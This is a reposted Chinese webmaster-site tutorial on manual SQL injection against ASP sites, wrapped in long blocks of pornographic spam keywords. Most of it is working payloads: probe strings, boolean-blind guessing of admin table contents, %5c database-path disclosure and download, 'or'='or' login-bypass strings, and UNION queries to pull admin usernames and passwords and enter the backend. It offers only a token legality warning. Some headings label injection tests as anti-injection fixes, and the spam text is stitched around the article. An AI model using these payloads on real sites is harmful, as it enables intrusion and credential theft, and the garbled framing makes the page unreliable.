亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 腳本攻防 查看內容

手工注入方法,方便大家測試程序漏洞

2022-9-27 08:28| 查看: 2308 |來源: 互聯網

1、加入單引號 ’提交, 結果:如果出現錯誤提示,則該網站可能就存在注入漏洞。 2、數字型判斷是否有注入; 語句:and 1=1 ;and 1=2 (經典)、' and '1'=1(字符型) 結果:分別返回不同的頁面,說明存在注入漏洞. 分析
1、加入單引號 ’提交,
結果:如果出現錯誤提示,則該網站可能就存在注入漏洞。

2、數字型判斷是否有注入; 語句:and 1=1 ;and 1=2 (經典)、' and '1'=1(字符型)
結果:分別返回不同的頁面,說明存在注入漏洞.
分析:and 的意思是“和”如果沒有過濾我們的語句,and 1=1就會被代入SQL查詢語句進行查詢, 如果and前后的兩條語句都是真的話就不會出錯,但如果前后語句有一個為假的話,程序就會暴錯。 也就表明程序有注入漏洞

防注入解決辦法:
1>使用or 2>1 ; or 1>2來進行判斷
結果:分別返回不同的頁面,說明存在注入漏洞.
分析:or注入只要求前后兩個語句只要有一個正確就為真,如果前后兩個語句都是正確的,反而為假。 記。簅r注入時,or后面的語句如果是正確的,則返回錯誤頁面!如果是錯誤,則返回正確頁面 ,說明存在注入點。

2> 使用xor 1=1; xor 1=2
結果:分別返回不同的頁面,說明存在注入漏洞.
分析:xor 代表著異或,意思即連接的表達式僅有一個為真的時候才為真。 記。簒or注入時,xor后面的語句如果是正確的,則返回錯誤頁面積,如果是錯誤,則返回正確 頁面,說明存在注入點。

3>把and 1=1轉換成URL編碼形式后在提交 and 1=1 URL編碼:%41%4E%44%20%%31%3D%31

4>使用-1;-0
分析:如果返回的頁面和前面不同,是另一則新聞,則表示有注入漏洞,是數字型的注入漏洞;在 URL地址后面加上 -0,URL變成 news.asp?id=123-0,返回的頁面和前面的頁面相同,加上-1,返回錯誤頁面,則也表示存在注入漏洞.

3、字符型判斷是否有注入:
語句:' and '1'=1;' and '1=2(經典)
結果:分別返回不同的頁面,說明存在注入漏洞.
分析:加入' and '1'=1返回正確頁面,加入' and '1=2返回錯誤頁面,說明有注入漏同。

防注入解決辦法:
在URL的地址后面加上'%2B'(字符型)
分析:URL地址變為:news.asp?id=123'%2B',返回的頁面和1同;加 上'2%2B'asdf,URL地址變為:news.asp?id=123'%2Basdf,返回的頁面和1 不同,或者說未發現該條記錄,或者錯誤,則表示存在注入點,是文本型的。

搜索型判斷是否有注入:
簡單的判斷搜索型注入漏洞存在不存在的辦法是先搜索',如果出錯,說明90%存在這個漏洞。然后搜索%,如果正常返回,說明95%有洞了。
說明:加入如"&"、"["、"]"、"%"、"$"、"@"等特殊字符,都可以實現,如果出現錯誤,說明有問題。
操作: 搜索一個關鍵字,比如2006吧,正常返回所有2006相關的信息,再搜索2006%'and 1=1 and '%'='和 2006%'and 1=2 and '%'=',存在異同的話,就是100%有洞了。關鍵字%' and 1=1 and '%'='% 關鍵字%' and 1=2 and '%'='% 將and 1=1 換成注入語句就可以了

判斷數據庫類型:
and user>0
例如:showdetail.asp?id=49 ;and user>0 如果是ACCESS數據庫,那么返回的錯誤里一般會有"Microsoft JET Database"關鍵定,如果是MSSQL數 據庫的話返回的錯誤提示里一般會含有"SQL Server"關鍵了.

猜表名 and exists (select * from 表名)
說明:意思與上面一樣,只是用的語名不一樣。

猜列名 and (select count(列名) from 表名)>0
說明:如果我們輸入的列名猜解正確否反回正常頁面

猜長度 and (select top 1 len(username) from admin)>0
說明:如果我們輸入的最后一位數據返回錯誤,而錯誤前一位數字返回正確,說明我所猜解的長度 為正確。

猜內容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii碼1-128
說明:如果我們輸入的最后一位數據返回錯誤,而錯誤前一位數字返回正確,說明我所猜解的數字正確。(可以使用折半法猜內容)
折半法:最小值與最大值差的一半,比如輸入50返正確,輸入100返回錯誤,折半后輸入75。
兩種常見爆庫
1、%5c
2、conn.asp

%5c暴庫 把二級目錄中間的/換成%5c EY: otherweb ... s.asp?BigClassName=職 責范圍&BigClassType=1 如果你能看到:’E:\ahttc040901 \otherweb\dz\database\iXuEr_Studio.asa’不是一 個有效的 路徑。 確定路徑名稱拼寫是否正確, 以及是否 連接到文件存放的服務器。 這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行 .
conn.asp暴庫 這個也是比較老的漏洞,利用價值不大

常見的:'or'='or'萬能密碼登陸
’or’=’or’這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有 : ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’ a’=’a 一個很老的利用方法,主要用于一些比較老的網站。

聯合查詢注入(union查詢)
操作步驟:
1>在正常語句后臺加入 and 1=2 union select * form 表名,其中*號代表字段數量,從1一直追加 (and 1=2 union select 1,2,3,4 form 表名)如果字段數正確就會有暴錯
2>在頁面顯示數字的地方用真實得到的字段名代替,如:username,password.
3>在頁面字段值處暴出真實的數據庫字段值。

查找后臺地址,找到后臺用得到的用戶管理員的帳戶與密碼進行登陸.

建議大家先手工檢測,熟練掌握基本注入方法,來提高自己的基本注入知識。
警告:不要用做非法用途,不要做有損國家的任何事情!
本文最后更新于 2022-9-27 08:28,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        欧美一区二区三区四区高清| 午夜精品福利视频网站| 成人一级片在线观看| 亚洲高清免费在线| 日韩精品久久久久久| 国产精品乱码久久久久久| 久久婷婷国产综合国色天香| 欧美精品日韩一本| 国产精品卡一卡二| jlzzjlzz国产精品久久| 亚洲综合图片区| 免费成人在线播放| 欧美激情一区不卡| 欧美伦理电影网| 欧美一级片在线看| 亚洲女与黑人做爰| 国产欧美视频一区二区| 91免费版在线| 亚洲最大的成人av| 国产精品99久久不卡二区| 色哟哟精品一区| 国产精品久久久久永久免费观看 | 9191精品国产综合久久久久久| 国内久久精品视频| 一区二区免费看| 6080国产精品一区二区| 欧美日韩在线电影| 成人综合婷婷国产精品久久免费| 丝袜美腿亚洲色图| 国产一区二区三区四区五区美女| 26uuu精品一区二区| 天天综合色天天| 国产精品丝袜一区| 国产亚洲精久久久久久| 91片在线免费观看| 亚洲欧美一区二区三区极速播放| 国产成人在线色| 美女爽到高潮91| 中文字幕一区二区三中文字幕| 中文字幕久久午夜不卡| 日韩免费高清av| 国产寡妇亲子伦一区二区| 精品人在线二区三区| 99久久99久久综合| 成人av影视在线观看| 色婷婷综合久久久中文一区二区| 2020国产精品久久精品美国| 精品国产不卡一区二区三区| 欧美日韩国产中文| 亚洲欧美日韩国产成人精品影院| 91国产视频在线观看| 国产成人精品www牛牛影视| 中文字幕亚洲不卡| 884aa四虎影成人精品一区| 成人av在线电影| 91福利精品第一导航| 91精品国产综合久久精品图片| 精品福利一二区| 日韩精品一区二区三区四区| 欧美日韩aaaaaa| 色婷婷国产精品| 青青国产91久久久久久| 亚洲婷婷综合久久一本伊一区| 欧美色图天堂网| 99在线热播精品免费| 亚洲女与黑人做爰| 国内精品在线播放| 精品国产91亚洲一区二区三区婷婷| 99视频精品免费视频| 色94色欧美sute亚洲13| 久久精品国产一区二区三| 久久久99精品免费观看| 26uuu国产一区二区三区| 久久久99久久| 亚洲免费成人av| 欧美一区二区在线免费播放| 久久综合色8888| 国产精品国产馆在线真实露脸| 国产精品网站在线播放| av在线播放一区二区三区| 欧美一卡二卡三卡四卡| 欧美体内she精高潮| 国产精品美女久久久久久| 久久国产精品99久久久久久老狼| 国产一本一道久久香蕉| 欧美亚洲高清一区二区三区不卡| 色综合久久综合网| 国产丶欧美丶日本不卡视频| 日韩久久免费av| 色老汉av一区二区三区| 国产高清精品网站| 中文字幕日本不卡| 3d成人h动漫网站入口| 精品国产百合女同互慰| 欧美精品123区| 国产欧美一区二区三区在线老狼| 3atv一区二区三区| 日韩精品欧美精品| 精品国产一区二区三区av性色| **欧美大码日韩| 日韩国产精品久久久久久亚洲| 亚洲精品国久久99热| 成人午夜电影网站| 国产欧美日产一区| 久久久一区二区三区| 91.麻豆视频| 国产肉丝袜一区二区| 久久亚洲一区二区三区明星换脸| 中文av一区特黄| 午夜精品在线视频一区| 国产精品久久三| 综合久久国产九一剧情麻豆| 国产人久久人人人人爽| 在线日韩av片| 亚洲一区二区视频在线观看| 成人va在线观看| 久久欧美一区二区| 婷婷一区二区三区| 久久久久久**毛片大全| 欧美一区二区三区免费大片 | 视频在线在亚洲| 五月综合激情网| 亚洲成在人线免费| 青椒成人免费视频| 99综合影院在线| 欧美高清精品3d| 日韩视频免费观看高清在线视频| 91国产免费看| 成人丝袜18视频在线观看| 国产精品白丝在线| 欧美一卡二卡三卡四卡| 欧美电影在线免费观看| 香港成人在线视频| 色8久久人人97超碰香蕉987| 日韩一区在线免费观看| 精品嫩草影院久久| 热久久免费视频| 日韩欧美精品三级| 激情综合色播五月| 久久精品国产在热久久| 成人精品视频一区二区三区| 国v精品久久久网| 日韩色在线观看| 中文字幕一区av| 91色porny蝌蚪| 欧美大片在线观看| 欧美一区二区不卡视频| 国产精一品亚洲二区在线视频| 欧美高清视频一二三区| 亚洲va国产va欧美va观看| 日本成人在线网站| 一区二区三区四区五区视频在线观看| 成人丝袜18视频在线观看| 亚洲一区av在线| 日韩一二在线观看| 亚洲一区二区视频在线观看| 欧美亚洲一区二区三区四区| 日韩电影在线观看一区| 精品国产乱码久久久久久1区2区 | 国产99久久久国产精品免费看| 欧美在线观看你懂的| 久久66热偷产精品| 久久99精品国产麻豆不卡| 国产一区二区福利视频| 色激情天天射综合网| 国产一区二区电影| 激情五月婷婷综合| 欧美最猛黑人xxxxx猛交| 久久影院视频免费| 成人性视频免费网站| 久久精品欧美日韩精品| 麻豆精品一区二区综合av| 中文字幕+乱码+中文字幕一区| 久久激情五月激情| 欧美性受极品xxxx喷水| 日韩午夜小视频| 久久久精品影视| 精品国产三级电影在线观看| 在线亚洲人成电影网站色www| 97精品国产露脸对白| 91在线观看成人| 日韩亚洲欧美高清| 国产精品乱人伦| 国产清纯美女被跳蛋高潮一区二区久久w| 日韩欧美在线1卡| 欧美国产欧美亚州国产日韩mv天天看完整| 亚洲国产欧美日韩另类综合| 99精品视频一区| 欧美国产日韩一二三区| 欧美日韩激情一区| 在线亚洲人成电影网站色www| 日本一区免费视频| av男人天堂一区| 国产精品一区二区视频| 久久99精品久久久久| 亚洲精品在线观看网站| thepron国产精品| 欧美激情中文字幕一区二区| 成人精品国产免费网站| 亚洲国产综合色|